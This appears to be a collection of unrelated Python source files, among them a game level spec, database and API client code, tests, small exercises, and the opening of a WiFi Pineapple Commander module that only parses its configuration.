'scale': Point3(1, 1, 1),
'collisionsOnly': 0,
'flattenType': 'light',
'loadType': 'loadModelCopy',
'modelPath': 'phase_11/models/lawbotHQ/LB_bookshelfA'},
100019: {'type': 'model', 'name': '<unnamed>',
'comment': '',
'parentEntId': 100018,
'pos': Point3(0.897832, -12.2053, 0.05),
'hpr': Vec3(180.47, 0, 0),
'scale': Point3(1, 1, 1),
'collisionsOnly': 0,
'flattenType': 'light',
'loadType': 'loadModelCopy',
'modelPath': 'phase_11/models/lawbotHQ/LB_couchA'},
100020: {'type': 'model', 'name': 'copy of <unnamed>',
'comment': '',
'parentEntId': 100018,
'pos': Point3(6.3491, -6.57612, 0.05),
'hpr': Vec3(90, 0, 0),
'scale': Point3(1, 1, 0.5),
'collisionsOnly': 0,
'flattenType': 'light',
'loadType': 'loadModelCopy',
'modelPath': 'phase_11/models/lawbotHQ/PartitionA'},
100021: {'type': 'model', 'name': 'copy of <unnamed> (2)',
'comment': '',
'parentEntId': 100018,
'pos': Point3(-20.9336, -5.07158, 0.05),
'hpr': Vec3(90, 0, 0),
'scale': Vec3(1.00449, 1.00449, 1.00449),
'collisionsOnly': 0,
'flattenType': 'light',
'loadType': 'loadModelCopy',
'modelPath': 'phase_11/models/lawbotHQ/LB_paper_twist_stacks'},
100022: {'type': 'model', 'name': 'copy of <unnamed> (3)',
'comment': '',
'parentEntId': 100018,
'pos': Point3(4.96172, -5.07158, 0.05),
'hpr': Vec3(272.49, 0, 0),
'scale': Vec3(1.00449, 1.00449, 1.00449),
'collisionsOnly': 0,
'flattenType': 'light',
'loadType': 'loadModelCopy',
'modelPath': 'phase_11/models/lawbotHQ/LB_paper_twist_stacks'},
100023: {'type': 'model', 'name': 'copy of <unnamed> (3)',
'comment': '',
'parentEntId': 100018,
'pos': Point3(-20.5363, -8.42755, 0.05),
'hpr': Vec3(90, 0, 0),
'scale': Vec3(1.00449, 1.00449, 1.00449),
'collisionsOnly': 0,
'flattenType': 'light',
'loadType': 'loadModelCopy',
'modelPath': 'phase_11/models/lawbotHQ/LB_chairA'},
100024: {'type': 'model', 'name': 'copy of <unnamed>',
'comment': '',
'parentEntId': 100018,
'pos': Point3(-4.9392, -12.3495, 0.05),
'hpr': Vec3(180.47, 0, 0),
'scale': Vec3(3.79099, 3.79099, 3.79099),
'collisionsOnly': 0,
'flattenType': 'light',
'loadType': 'loadModelCopy',
'modelPath': 'phase_11/models/lawbotHQ/LB_torch_lampA'},
100026: {'type': 'model', 'name': '<unnamed>',
'comment': '',
'parentEntId': 100025,
'pos': Point3(16.7866, 12.9562, 0.1),
'hpr': Vec3(185.194, 0, 0),
'scale': Vec3(1.2, 1.2, 1.2),
'collisionsOnly': 0,
'flattenType': 'light',
'loadType': 'loadModelCopy',
'modelPath': 'phase_11/models/lawbotHQ/LB_bookshelfA'},
100027: {'type': 'model', 'name': 'copy of <unnamed>',
'comment': '',
'parentEntId': 100025,
'pos': Point3(-21.2469, 12.8535, 0.0929851),
'hpr': Vec3(187.125, 0, 0),
'scale': Vec3(1.2, 1.2, 1.2),
'collisionsOnly': 0,
'flattenType': 'light',
'loadType': 'loadModelCopy',
'modelPath': 'phase_11/models/lawbotHQ/LB_bookshelfA'},
100028: {'type': 'model', 'name': 'copy of <unnamed> (2)',
'comment': '',
'parentEntId': 100025,
'pos': Point3(5.20127, 12.8535, 0.0929851),
'hpr': Vec3(180, 0, 0),
'scale': Vec3(1.2, 1.2, 1.2),
'collisionsOnly': 0,
'flattenType': 'light',
'loadType': 'loadModelCopy',
'modelPath': 'phase_11/models/lawbotHQ/LB_bookshelfA'},
100029: {'type': 'model', 'name': 'copy of <unnamed> (3)',
'comment': '',
'parentEntId': 100025,
'pos': Point3(-8.51009, 13.1118, 0.0929851),
'hpr': Vec3(180, 0, 0),
'scale': Vec3(1.2, 1.2, 1.2),
'collisionsOnly': 0,
'flattenType': 'light',
'loadType': 'loadModelCopy',
'modelPath': 'phase_11/models/lawbotHQ/LB_bookshelfA'},
100030: {'type': 'model', 'name': 'copy of <unnamed> (2)',
'comment': '',
'parentEntId': 100025,
'pos': Point3(-15.7803, 1.79844, 0.0929851),
'hpr': Vec3(188.13, 0, 0),
'scale': Vec3(1.2, 1.2, 1.2),
'collisionsOnly': 0,
'flattenType': 'light',
'loadType': 'loadModelCopy',
'modelPath': 'phase_11/models/lawbotHQ/LB_bookshelfA'},
100031: {'type': 'model', 'name': 'copy of <unnamed> (3)',
'comment': '',
'parentEntId': 100025,
'pos': Point3(14.449, 2.90238, 0.0929851),
'hpr': Vec3(184.764, 0, 0),
'scale': Vec3(1.2, 1.2, 1.2),
'collisionsOnly': 0,
'flattenType': 'light',
'loadType': 'loadModelCopy',
'modelPath': 'phase_11/models/lawbotHQ/LB_bookshelfA'},
100032: {'type': 'model', 'name': 'copy of <unnamed> (4)',
'comment': '',
'parentEntId': 100025,
'pos': Point3(12.2409, -22.0432, 0.0929851),
'hpr': Vec3(184.764, 0, 0),
'scale': Point3(1.4, 1.4, 1.4),
'collisionsOnly': 0,
'flattenType': 'light',
'loadType': 'loadModelCopy',
'modelPath': 'phase_11/models/lawbotHQ/LB_bookshelfA'},
100033: {'type': 'model', 'name': 'copy of <unnamed> (3)',
'comment': '',
'parentEntId': 100025,
'pos': Point3(-1.1837, 1.79844, 0.0929851),
'hpr': Vec3(170.538, 0, 0),
'scale': Vec3(1.2, 1.2, 1.2),
'collisionsOnly': 0,
'flattenType': 'light',
'loadType': 'loadModelCopy',
'modelPath': 'phase_11/models/lawbotHQ/LB_bookshelfA'},
10000: {'type': 'nodepath', 'name': 'props',
'comment': '',
'parentEntId': 0,
'pos': Point3(0, 0, -2),
'hpr': Vec3(0, 0, 0),
'scale': 1},
10018: {'type': 'nodepath', 'name': 'rightVertPipes',
'comment': '',
'parentEntId': 10021,
'pos': Point3(-16.4537, -45.3982, -8.4),
'hpr': Vec3(0, 0, 0),
'scale': Point3(0.65, 0.65, 1.56)},
10021: {'type': 'nodepath', 'name': 'rightPipes',
'comment': '',
'parentEntId': 10000,
'pos': Point3(0, 0, 0),
'hpr': Vec3(0, 0, 0),
'scale': 1},
100001: {'type': 'nodepath', 'name': 'cameraTarget1',
'comment': '',
'parentEntId': 0,
'pos': Point3(10, 10, 0),
'hpr': Vec3(0, 0, 0),
'scale': Vec3(1, 1, 1)},
100002: {'type': 'nodepath', 'name': 'copy of cameraTarget1',
'comment': '',
'parentEntId': 0,
'pos': Point3(30, -10, 0),
'hpr': Vec3(0, 0, 0),
'scale': Vec3(1, 1, 1)},
100003: {'type': 'nodepath', 'name': 'copy of cameraTarget1',
'comment': '',
'parentEntId': 0,
'pos': Point3(40, 10, 0),
'hpr': Vec3(0, 0, 0),
'scale': Vec3(1, 1, 1)},
100005: {'type': 'nodepath', 'name': '<unnamed>',
'comment': '',
'parentEntId': 0,
'pos': Point3(-30, 0, 0),
'hpr': Vec3(0, 0, 0),
'scale': 1},
100006: {'type': 'nodepath', 'name': 'copy of <unnamed>',
'comment': '',
'parentEntId': 0,
'pos': Point3(-60, 15, 0),
'hpr': Vec3(0, 0, 0),
'scale': 1},
100007: {'type': 'nodepath', 'name': 'copy of <unnamed> (2)',
'comment': '',
'parentEntId': 0,
'pos': Point3(-60, -15, 0),
'hpr': Vec3(0, 0, 0),
'scale': 1},
100009: {'type': 'nodepath', 'name': 'camera3 target',
'comment': '',
'parentEntId': 0,
'pos': Point3(25, -2, 0),
'hpr': Vec3(0, 0, 0),
'scale': 1},
100010: {'type': 'nodepath', 'name': 'copy of camera3 target',
'comment': '',
'parentEntId': 0,
'pos': Point3(-10, -2, 0),
'hpr': Vec3(0, 0, 0),
'scale': 1},
100011: {'type': 'nodepath', 'name': 'copy of camera3 target (2)',
'comment': '',
'parentEntId': 0,
'pos': Point3(-50, -2, 0),
'hpr': Vec3(0, 0, 0),
'scale': 1},
100013: {'type': 'nodepath', 'name': '<unnamed>',
'comment': '',
'parentEntId': 0,
'pos': Point3(-10, 60, 10),
'hpr': Vec3(0, 0, 0),
'scale': 1},
100014: {'type': 'nodepath', 'name': 'copy of <unnamed>',
'comment': '',
'parentEntId': 0,
'pos': Point3(-10, 40, 10),
'hpr': Vec3(0, 0, 0),
'scale': 1},
100018: {'type': 'nodepath', 'name': 'wall1parent',
'comment': '',
'parentEntId': 0,
'pos': Point3(-7.53236, 20.7488, 0),
'hpr': Vec3(0, 0, 0),
'scale': Vec3(1, 1, 1)},
100025: {'type': 'nodepath', 'name': 'wall2',
'comment': '',
'parentEntId': 0,
'pos': Point3(-7.36698, -23.6933, 0),
'hpr': Vec3(0, 0, 0),
'scale': Vec3(1, 1, 1)},
100035: {'type': 'nodepath', 'name': 'targ1',
'comment': '',
'parentEntId': 0,
'pos': Point3(-27.7132, -17.0199, 0),
'hpr': Vec3(0, 0, 0),
'scale': Vec3(1, 1, 1)},
100036: {'type': 'nodepath', 'name': 'copy of targ1',
'comment': '',
'parentEntId': 0,
'pos': Point3(9.37401, -17.0199, 0),
'hpr': Vec3(0, 0, 0),
'scale': Vec3(1, 1, 1)},
100038: {'type': 'nodepath', 'name': 'tegrat',
'comment': '',
'parentEntId': 0,
'pos': Point3(8.31643, -40.4532, 0),
'hpr': Vec3(0, 0, 0),
'scale': Vec3(1, 1, 1)},
100039: {'type': 'nodepath', 'name': 'copy of tegrat',
'comment': '',
'parentEntId': 0,
'pos': Point3(-27.6613, -37.0841, 0),
'hpr': Vec3(0, 0, 0),
'scale': Vec3(1, 1, 1)},
100040: {'type': 'nodepath', 'name': 'copy of tegrat (2)',
'comment': '',
'parentEntId': 0,
'pos': Point3(-6.48412, -29.8115, 0),
'hpr': Vec3(0, 0, 0),
'scale': Vec3(1, 1, 1)},
100042: {'type': 'nodepath', 'name': 'gettar',
'comment': '',
'parentEntId': 0,
'pos': Point3(-7.92397, 14.3026, 0),
'hpr': Vec3(0, 0, 0),
'scale': Vec3(1, 1, 1)},
100043: {'type': 'nodepath', 'name': 'copy of gettar',
'comment': '',
'parentEntId': 0,
'pos': Point3(-23.1978, 15.1905, 0),
'hpr': Vec3(0, 0, 0),
'scale': Vec3(1, 1, 1)},
100000: {'type': 'securityCamera', 'name': '<unnamed>',
'comment': '',
'parentEntId': 0,
'pos': Point3(33.4453, -2.27555, 0),
'hpr': Point3(-3, 0, 0),
'scale': Vec3(1, 1, 1),
'accel': 6.0,
'damPow': 8,
'hideModel': 0,
'maxVel': 10.0,
'modelPath': 0,
'projector': Point3(-3, -3, 25),
'radius': 6.0,
'switchId': 0,
'trackTarget1': 100001,
'trackTarget2': 100002,
'trackTarget3': 100003},
100004: {'type': 'securityCamera', 'name': '<unnamed>',
'comment': '',
'parentEntId': 0,
'pos': Point3(-58.4773, 4.03197, 0),
'hpr': Vec3(0, 0, 0),
'scale': Vec3(1, 1, 1),
'accel': 4.0,
'damPow': 8,
'hideModel': 0,
'maxVel': 15.0,
'modelPath': 0,
'projector': Point3(6, 6, 25),
'radius': 5,
'switchId': 0,
'trackTarget1': 100005,
'trackTarget2': 100006,
'trackTarget3': 100007},
100008: {'type': 'securityCamera', 'name': '<unnamed>',
'comment': '',
'parentEntId': 0,
'pos': Point3(-22.5923, -33.41, 0),
'hpr': Vec3(0, 0, 0),
'scale': Vec3(1, 1, 1),
'accel': 17.0,
'damPow': 8,
'hideModel': 0,
'maxVel': 20.0,
'modelPath': 0,
'projector': Point3(12, 16, 32),
'radius': 7.0,
'switchId': 0,
'trackTarget1': 100009,
'trackTarget2': 100010,
'trackTarget3': 100011},
100012: {'type': 'securityCamera', 'name': '<unnamed>',
'comment': '',
'parentEntId': 0,
'pos': Point3(-9.20073, 65.6563, 8.45),
'hpr': Vec3(0, 0, 0),
'scale': Vec3(1, 1, 1),
'accel': 7.0,
'damPow': 8,
'hideModel': 0,
'maxVel': 15.0,
'modelPath': 0,
'projector': Point3(0, 0, 17),
'radius': 5,
'switchId': 0,
'trackTarget1': 100014,
'trackTarget2': 100013,
'trackTarget3': 0},
100034: {'type': 'securityCamera', 'name': '<unnamed>',
'comment': '',
'parentEntId': 0,
'pos': Point3(0, -10.5537, 0),
'hpr': Vec3(0, 0, 0),
'scale': Vec3(1, 1, 1),
'accel': 40.0,
'damPow': 8,
'hideModel': 0,
'maxVel': 20.0,
'modelPath': 0,
'projector': Point3(10, 0, 25),
'radius': 4.0,
'switchId': 0,
'trackTarget1': 100035,
'trackTarget2': 100036,
'trackTarget3': 0},
100037: {'type': 'securityCamera', 'name': '<unnamed>',
'comment': '',
'parentEntId': 0,
'pos': Point3(-28.9964, -30.2849, 0),
'hpr': Vec3(0, 0, 0),
'scale': Vec3(1, 1, 1),
'accel': 5.0,
'damPow': 8,
'hideModel': 0,
'maxVel': 12.0,
'modelPath': 0,
'projector': Point3(6, 6, 25),
'radius': 5,
'switchId': 0,
'trackTarget1': 100039,
'trackTarget2': 100038,
'trackTarget3': 100040},
100041: {'type': 'securityCamera', 'name': '<unnamed>',
'comment': '',
'parentEntId': 0,
'pos': Point3(-32.9569, 19.6137, 0.0470875),
'hpr': Vec3(0, 0, 0),
'scale': Vec3(1, 1, 1),
'accel': 12.0,
'damPow': 8,
'hideModel': 0,
'maxVel': 5,
'modelPath': 0,
'projector': Point3(12, 0, 25),
'radius': 5,
'switchId': 0,
'trackTarget1': 100042,
'trackTarget2': 100043,
'trackTarget3': 0}}
Scenario0 = {}
levelSpec = {'globalEntities': GlobalEntities, 'scenarios': [
Scenario0]}
|
python
|
__author__ = "The One & Only Javi"
__version__ = "1.0.0"
__start_date__ = "25th July 2020"
__end_date__ = "5th August 2020"
__maintainer__ = "me"
__email__ = "[email protected]"
__requirements__ = "SQL-Alchemy, MySQL," \
" Flask-SQLAlchemy, database.py, " \
"models.py, video_ops.py"
__status__ = "Production"
__description__ = """
This is the main background operations script.
It is meant to be used with app.py, which should call the methods
"""
import mysql.connector
import json
import os
import subprocess
import sys
import requests
import random
from flask import *
from database import *
from video_ops import *
from models import *
from main_ops import *
from sqlalchemy import *
from sqlalchemy.sql import *
from typing import List, Dict
from datetime import datetime
class Update_DB:
def update_after_fragment(con, input_content_id, output_file_path,
video_key, kid):
packaged_content_id = random.randint(0, 100)
result = con.execute(
uploaded_videos.update().where(
uploaded_videos.c.input_content_id
== input_content_id).values(
status='Fragmented', output_file_path=output_file_path,
video_key=video_key, kid=kid,
packaged_content_id=packaged_content_id))
output_string = ("\n\n" + datetime.now().strftime(
"%d/%m/%Y %H:%M:%S") +
" - Starting video encryptation with" +
" the following packaged_content_id:")
print(output_string, file=sys.stdout)
print(packaged_content_id, file=sys.stdout)
return packaged_content_id
def update_after_encrypt(con, input_content_id, output_file_path):
output_string = (
"\n\n" +
datetime.now().strftime("%d/%m/%Y %H:%M:%S") +
" - Starting MPEG-DASH transcoding")
print(output_string, file=sys.stdout)
result = con.execute(
uploaded_videos.update().where(
uploaded_videos.c.input_content_id
== input_content_id).values(
status='Encrypted', output_file_path=output_file_path))
def update_after_dash(con, input_content_id,
dash_output, packaged_content_id):
output_string = ("\n\n" + datetime.now().strftime(
"%d/%m/%Y %H:%M:%S") +
" - Everything went successful. Returning JSON")
print(output_string, file=sys.stdout)
result = con.execute(
uploaded_videos.update().where(
uploaded_videos.c.input_content_id
== input_content_id).values(
status='Ready', url=dash_output))
"""We return 1 for successful, url address,
and packaged_content_id"""
output = (1, dash_output, packaged_content_id)
return output
|
python
|
from .PZT import PZTMountedGrounded
|
python
|
from robofab.world import CurrentGlyph
from robofab.pens.filterPen import thresholdGlyph
d = 10
thresholdGlyph(CurrentGlyph(), d)
|
python
|
# Two-sided notes
create_table_notes_ab = """
create table if not exists notes_ab
(
id text,
front text,
back text,
PRIMARY KEY(id)
)
"""
# One-sided notes
create_table_notes_qa = """
create table if not exists notes_qa
(
id text,
front text,
back text,
PRIMARY KEY(id)
)
"""
# The join table for notes/tags n:m relation
create_table_tags = """
create table if not exists tags
(
note_id text,
tag text,
PRIMARY KEY(note_id, tag)
)
"""
|
python
|
import pysftp
server_host = "demo.wftpserver.com"
username = "demo"
password = "demo"
with pysftp.Connection(server_host, username=username, password=password, port=2222) as sftp:
print(sftp.pwd)
# with sftp.cd('public'): # temporarily chdir to public
# sftp.put('/my/local/filename') # upload file to public/ on remote
# sftp.get('remote_file') # get a remote file
#added a new file
|
python
|
# -*- coding: utf-8 -*-
"""
netvisor.responses.products
~~~~~~~~~~~~~~~~~~~~~~~~~~~
:copyright: (c) 2013-2016 by Fast Monkeys Oy.
:license: MIT, see LICENSE for more details.
"""
from ..schemas import GetProductSchema, ProductListSchema
from .base import Response
class ProductListResponse(Response):
schema_cls = ProductListSchema
tag_name = 'product_list'
class GetProductResponse(Response):
schema_cls = GetProductSchema
tag_name = 'product'
|
python
|
#
# Copyright 2015 BMC Software, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import os
import json
import requests
import urllib
import logging
import boundary.util as util
class ApiCall(object):
def __init__(self, api_host="api.truesight.bmc.com", email=None, api_token=None):
"""
:param api_host: api end point host
:param email: TrueSight Pulse account e-mail
:param api_token: TrueSight Pulse api token
:return: returns nothing
:Example:
from boundary import API
            api = API(email="[email protected]", api_token="api.xxxxxxxxxx-yyyy")
"""
self._kwargs = None
self._methods = {"DELETE": self._do_delete,
"GET": self._do_get,
"POST": self._do_post,
"PUT": self._do_put}
self._api_host = "premium-api.boundary.com"
self._email = None
self._api_token = None
self._curl = False
# All member variables related to REST CALL
self._scheme = "https"
self._method = "GET"
self._headers = None
self._data = None
self._url = None
self._path = None
self._url_parameters = None
self._api_result = None
self.logLevel = None
# Set the api_host, email, api token set by environment
# variables then override with those passed in
self._get_environment()
if api_host is not None:
self._api_host = api_host
if email is not None:
self._email = email
if api_token is not None:
self._api_token = api_token
#
# data
#
@property
def data(self):
"""
Value of the HTTP payload
:return:
"""
return self._data
@data.setter
def data(self, data):
self._data = data
#
# headers
#
@property
def headers(self):
return self._headers
@headers.setter
def headers(self, headers):
self._headers = headers
#
# method
#
@property
def method(self):
"""
"""
return self._method
@method.setter
def method(self, value):
"""
Before assigning the value validate that is in one of the
HTTP methods we implement
"""
keys = self._methods.keys()
if value not in keys:
raise AttributeError("Method value not in " + str(keys))
else:
self._method = value
#
# path
#
@property
def path(self):
return self._path
@path.setter
def path(self, value):
self._path = value
#
# url_parameters
#
@property
def url_parameters(self):
return self._url_parameters
@url_parameters.setter
def url_parameters(self, url_parameters):
self._url_parameters = url_parameters
def _get_environment(self):
"""
Gets the configuration stored in environment variables
"""
if 'TSP_EMAIL' in os.environ:
self._email = os.environ['TSP_EMAIL']
if 'TSP_API_TOKEN' in os.environ:
self._api_token = os.environ['TSP_API_TOKEN']
if 'TSP_API_HOST' in os.environ:
self._api_host = os.environ['TSP_API_HOST']
else:
self._api_host = 'api.truesight.bmc.com'
def _get_url_parameters(self):
"""
Encode URL parameters
"""
url_parameters = ''
if self._url_parameters is not None:
url_parameters = '?' + urllib.urlencode(self._url_parameters)
return url_parameters
def metric_get(self, enabled=False, custom=False):
"""
Returns a metric definition identified by name
:param enabled: Return only enabled metrics
:param custom: Return only custom metrics
:return Metrics:
"""
        self.path = 'v1/metrics?enabled={0}&custom={1}'.format(enabled, custom)
self._call_api()
self._handle_results()
return self.metrics
def get_api_parameters(self):
pass
def handle_api_results(self):
pass
def _do_get(self):
"""
HTTP Get Request
"""
return requests.get(self._url, data=self._data, headers=self._headers, auth=(self._email, self._api_token))
def _do_delete(self):
"""
HTTP Delete Request
"""
return requests.delete(self._url, data=self._data, headers=self._headers, auth=(self._email, self._api_token))
def _do_post(self):
"""
HTTP Post Request
"""
return requests.post(self._url, data=self._data, headers=self._headers, auth=(self._email, self._api_token))
def _do_put(self):
"""
HTTP Put Request
"""
return requests.put(self._url, data=self._data, headers=self._headers, auth=(self._email, self._api_token))
def good_response(self, status_code):
"""
Determines what status codes represent a good response from an API call.
"""
return status_code == requests.codes.ok
def form_url(self):
return "{0}://{1}/{2}{3}".format(self._scheme, self._api_host, self._path, self._get_url_parameters())
def _curl_output(self):
headers = ""
if self._headers is not None:
for key in self._headers:
headers = headers + ' -H "{0}: {1}"'.format(key, self._headers[key])
data = None
if self._data is not None:
data = " -d '{0}'".format(self._data)
else:
data = ''
url = ' "{0}"'.format(self.form_url())
print('curl -X {0} -u "{1}:{2}"{3}{4}{5}'.format(self._method,
self._email,
self._api_token,
headers,
data,
url))
def _call_api(self):
"""
Make an API call to get the metric definition
"""
self._url = self.form_url()
if self._headers is not None:
logging.debug(self._headers)
if self._data is not None:
logging.debug(self._data)
if len(self._get_url_parameters()) > 0:
logging.debug(self._get_url_parameters())
result = self._methods[self._method]()
if not self.good_response(result.status_code):
logging.error(self._url)
logging.error(self._method)
if self._data is not None:
logging.error(self._data)
logging.error(result)
self._api_result = result
def handle_key_word_args(self):
pass
def api_call(self):
self._get_environment()
self.handle_key_word_args()
self.get_api_parameters()
self._call_api()
return self._handle_api_results()
def _handle_api_results(self):
result = None
# Only process if we get HTTP result of 200
if self._api_result.status_code == requests.codes.ok:
result = json.loads(self._api_result.text)
return result
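# A minimal usage sketch (added; the e-mail and token below are placeholders,
# not real credentials). It drives the base class directly: set a path and
# method, then call api_call(), which returns the decoded JSON body on an
# HTTP 200 response and None otherwise.
if __name__ == "__main__":
    api = ApiCall(email="user@example.com", api_token="api.xxxxxxxxxx-yyyy")
    api.method = "GET"
    api.path = "v1/metrics"
    print(api.api_call())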
|
python
|
#!/usr/bin/python3
from venus.stock_base import StockEventBase
class EventStockFlag(StockEventBase):
def flag_quit_stock(self, stock_code):
import datetime
import pandas as pd
from datetime import date
from dev_global.env import TIME_FMT
result = self.mysql.select_values(stock_code, 'trade_date')
if not result.empty:
result = result[0].tolist()
d = datetime.date.today() - result[-1]
if d.days > 150:
return True
else:
return False
else:
return False
def flag_index(self, stock_code):
from venus.form import formStockManager
result = self.mysql.session.query(
formStockManager.stock_code,
formStockManager.flag
).filter_by(stock_code=stock_code)
if result:
result.update(
{"flag": 'i'}
)
self.mysql.session.commit()
return 1
def flag_stock(self, stock_code):
from venus.form import formStockManager
result = self.mysql.session.query(
formStockManager.stock_code,
formStockManager.flag
).filter_by(stock_code=stock_code)
if result:
result.update(
{"flag": 't'}
)
self.mysql.session.commit()
return 1
def flag_b_stock(self, stock_code):
from venus.form import formStockManager
result = self.mysql.session.query(
formStockManager.stock_code,
formStockManager.flag
).filter_by(stock_code=stock_code)
if result:
result.update(
{"flag": 'b'}
)
self.mysql.session.commit()
return 1
def flag_hk_stock(self, stock_code):
from venus.form import formStockManager
result = self.mysql.session.query(
formStockManager.stock_code,
formStockManager.flag
).filter_by(stock_code=stock_code)
if result:
result.update(
{"flag": 'h'}
)
self.mysql.session.commit()
return 1
if __name__ == "__main__":
import re
from dev_global.env import GLOBAL_HEADER
from venus.stock_flag import EventStockFlag
event = EventStockFlag(GLOBAL_HEADER)
stock_list = event.get_all_security_list()
for stock_code in stock_list:
if re.match(r'^SH000|^SH950|^SZ399', stock_code):
event.flag_index(stock_code)
|
python
|
from typing import List


class Solution:
def makesquare(self, matchsticks: List[int]) -> bool:
if len(matchsticks) < 4:
return False
perimeter = sum(matchsticks)
if perimeter % 4 != 0:
return False
A = sorted(matchsticks)[::-1]
def dfs(selected: int, edges: List[int]) -> bool:
if selected == len(A):
return all(edge == edges[0] for edge in edges)
for i, edge in enumerate(edges):
if A[selected] > edge:
continue
edges[i] -= A[selected]
if dfs(selected + 1, edges):
return True
edges[i] += A[selected]
return False
return dfs(0, [perimeter // 4] * 4)
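# A short usage sketch (added; assumes Python 3 with the typing import above):
# [1, 1, 2, 2, 2] can form a square of side 2, while [3, 3, 3, 3, 4] cannot.
if __name__ == "__main__":
    solver = Solution()
    print(solver.makesquare([1, 1, 2, 2, 2]))  # expected: True
    print(solver.makesquare([3, 3, 3, 3, 4]))  # expected: False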
|
python
|
#!/usr/bin/env python
tuple= ["Juan", 5, 20.80, "HOLA"]
tuple2= [1,2,3]
lista3= [[1,2,3], [1, 3, 6], "HOLA"]
print tuple[0]
print tuple[1:2]
print tuple[2:]
print tuple *2
print tuple+tuple2
print lista3
|
python
|
# Copyright 2016-2017 Curtis Sand <[email protected]>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tasks core library."""
import pkgutil
import inspect
import os.path
from escadrille.verbosity import dprint
from escadrille.verbosity import vprint
def find_tasks(module, prefix):
"""Return an enum of config file tasks mapping names to task callables."""
dprint('lib.tasks.core: finding tasks in %s (prefix: %s)' %
(module, prefix))
task_map = {}
for importer, modname, ispkg in pkgutil.walk_packages([module], prefix):
if ispkg:
continue
module = importer.find_module(modname).load_module(modname)
for _, cls in inspect.getmembers(module, inspect.isclass):
if issubclass(cls, Task) and cls != Task:
task_map[cls.config_name] = cls
dprint('task_map: %s' % task_map)
return task_map
class TaskCore(object):
"""An internal class to be shared by option mixins and Task objects."""
config_name = 'noop'
# constant for easy output formatting
indent = ' '
msg_template = '%s%s=%s\n'
def __init__(self, config_file=None, tag=None, shared_state=None):
"""Set up instance variables for an escadrille task object."""
self.config_file = config_file
self.tag = tag
self.shared_state = shared_state
self.warnings, self.errors, self.status = None, None, None
self._clear_status()
self.loaded = False
def load_config(self):
"""A method to be subclassed to load info from the config file."""
if not self.loaded:
self.dprint('Loading the config for %s.' % self.tag)
self._load_config()
self.loaded = True
def _load_config(self):
"""An internal method for subclasses to load their config values."""
pass
def _clear_status(self):
"""Reset the warnings and errors lists and the status code."""
self.warnings = []
self.errors = []
self.status = None
def _set_status(self):
"""Set error status to the length of the warnings and errors lists."""
self.status = len(self.errors)
def dprint(self, msg):
"""Call the conditional debug print method."""
dprint(msg)
def vprint(self, msg):
"""Call the conditional verbose print method."""
vprint(msg)
@staticmethod
def sanitize_path(path):
"""Take a string and run it through some sanitization methods."""
return os.path.abspath(os.path.expanduser(path))
@property
def config_snippet_name(self):
"""Create a config string for the name of the current task."""
return "%stask=%s\n" % (self.indent, self.config_name)
class Task(TaskCore):
"""Base Task object for Escadrille.
The config_name attribute is used to reference the task class from the
config file.
The __init__ and __call__ methods should be implemented by the subclasses.
The constructor should configure the task with everything needed to perform
the task. A well designed task does not have state and can therefore be
repeated. The task subclass needs to implement any checks or validation
    required to operate in this way.
The call method clears the "warnings", "errors" and "status" attributes
before starting the task and then can use the "_set_status" method to
update the status appropriately at the end of the task.
"""
def __call__(self, *args, **kwargs):
"""Execute the core task behaviour."""
self._clear_status()
self.load_config()
self.dprint(self.debug_msg())
def debug_msg(self):
"""If supported, generate and return a debug string."""
self.load_config()
return "%s Debug" % self.__class__.__name__
@property
def default_config(self):
"""Return a string of default example section for config file."""
self.load_config()
return ""
|
python
|
from plenum.common.constants import ALIAS, SERVICES, VALIDATOR
from plenum.test.helper import sendReqsToNodesAndVerifySuffReplies
from plenum.test.node_catchup.helper import waitNodeDataEquality, \
checkNodeDataForInequality
from plenum.test.pool_transactions.helper import \
updateNodeData
from stp_core.common.log import getlogger
from plenum.test.node_catchup.conftest import whitelist
logger = getlogger()
def test_catch_up_after_demoted(
txnPoolNodeSet, nodeSetWithNodeAddedAfterSomeTxns):
logger.info(
"1. add a new node after sending some txns and check that catch-up "
"is done (the new node is up to date)")
looper, newNode, client, wallet, newStewardClient, \
newStewardWallet = nodeSetWithNodeAddedAfterSomeTxns
waitNodeDataEquality(looper, newNode, *txnPoolNodeSet[:4])
logger.info("2. turn the new node off (demote)")
node_data = {
ALIAS: newNode.name,
SERVICES: []
}
updateNodeData(looper, newStewardClient,
newStewardWallet, newNode,
node_data)
logger.info("3. send more requests, "
"so that the new node's state is outdated")
sendReqsToNodesAndVerifySuffReplies(looper, wallet, client, 5)
checkNodeDataForInequality(newNode, *txnPoolNodeSet[:-1])
logger.info("4. turn the new node on")
node_data = {
ALIAS: newNode.name,
SERVICES: [VALIDATOR]
}
updateNodeData(looper, newStewardClient,
newStewardWallet, newNode,
node_data)
logger.info("5. make sure catch-up is done "
"(the new node is up to date again)")
waitNodeDataEquality(looper, newNode, *txnPoolNodeSet[:-1])
logger.info("6. send more requests and make sure "
"that the new node participates in processing them")
sendReqsToNodesAndVerifySuffReplies(looper, wallet, client, 10)
waitNodeDataEquality(looper, newNode, *txnPoolNodeSet[:-1])
|
python
|
#!/usr/bin/python
"""
Commander.py - Python Backend for the WiFi Pineapple Commander module.
Version 2 Codename: Electric Boogaloo
Thanks to: sebkinne & tesla
Foxtrot (C) 2016 <[email protected]>
"""
import os
import ConfigParser
import sys
import socket
import time
import string
import select
import errno
class Commander(object):
print "[*] WiFi Pineapple Commander Module"
def run(self):
while True:
self.fillBuffer()
self.parseCommands()
def parseConfig(self):
if os.path.exists('commander.conf'):
self.config = ConfigParser.RawConfigParser()
self.config.read('commander.conf')
if self.config.has_section('Network') and self.config.has_section('Security') and self.config.has_section('Commands') and self.config.has_section('Other'):
print "[*] Valid configuration file found!"
print ""
else:
print "[!] No valid configuration file found... Exiting!"
sys.exit(1)
self.server = self.config.get('Network', 'Server')
self.port = self.config.getint('Network', 'Port')
self.nick = self.config.get('Network', 'Nickname')
